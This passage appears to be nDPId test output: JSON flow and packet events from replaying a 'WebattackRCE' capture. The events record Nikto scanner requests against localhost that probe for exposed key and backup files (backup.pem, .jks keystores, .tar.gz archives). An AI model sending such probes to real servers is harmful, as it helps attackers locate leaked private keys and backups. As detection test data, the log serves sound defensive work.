{"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1576420276945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276945,"pkt":"AAAAAAAAAAAAAAAACABFAAC9GW5AAEAGIst\/AAABfwAAAcLqH5C0ISE5HkW76YAYAED+sQAAAQEICp1m+\/mdZvv5R0VUIC8xLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1576420276947,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276947,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hilAAEAGtg9\/AAABfwAAAcLsH5DmS75z\/EZQIIAYAED+sQAAAQEICp1m+\/udZvv7R0VUIC8xLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1576420276949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276949,"pkt":"AAAAAAAAAAAAAAAACABFAADG8sFAAEAGSW5\/AAABfwAAAcLuH5DZeMrrTWBmVIAYAED+ugAAAQEICp1m+\/2dZvv9R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1576420276950,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276950,"pkt":"AAAAAAAAAAAAAAAACABFAADGIHlAAEAGG7d\/AAABfwAAAcLwH5AJERgjseiOe4AYAED+ugAAAQEICp1m+\/6dZvv+R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1576420276953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276953,"pkt":"AAAAAAAAAAAAAAAACABFAADB609AAEAGUOV\/AAABfwAAAcLyH5CMSNMc4cqoooAYAED+tQAAAQEICp1m\/AGdZvwBR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1576420276955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276955,"pkt":"AAAAAAAAAAAAAAAACABFAADBW5ZAAEAG4J5\/AAABfwAAAcL0H5DrXWPDXa4XUYAYAED+tQAAAQEICp1m\/AOdZvwDR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1576420276956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276956,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/O0xAAEAGAOt\/AAABfwAAAcL2H5D9kwMeqK3jJ4AYAED+swAAAQEICp1m\/ASdZvwER0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1576420276957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276957,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/H8ZAAEAGHHF\/AAABfwAAAcL4H5BlEieUASYiL4AYAED+swAAAQEICp1m\/AWdZvwFR0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1576420276959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276959,"pkt":"AAAAAAAAAAAAAAAACABFAADIMS5AAEAGCwB\/AAABfwAAAcL6H5D33Al8T9gIjoAYAED+vAAAAQEICp1m\/AedZvwHR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1576420276960,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276960,"pkt":"AAAAAAAAAAAAAAAACABFAADI29RAAEAGYFl\/AAABfwAAAcL8H5B21OOLlrDXQ4AYAED+vAAAAQEICp1m\/AidZvwIR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1576420276961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276961,"pkt":"AAAAAAAAAAAAAAAACABFAADFGIxAAEAGI6V\/AAABfwAAAcL+H5DvJyDTt9IC\/IAYAED+uQAAAQEICp1m\/AmdZvwJR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 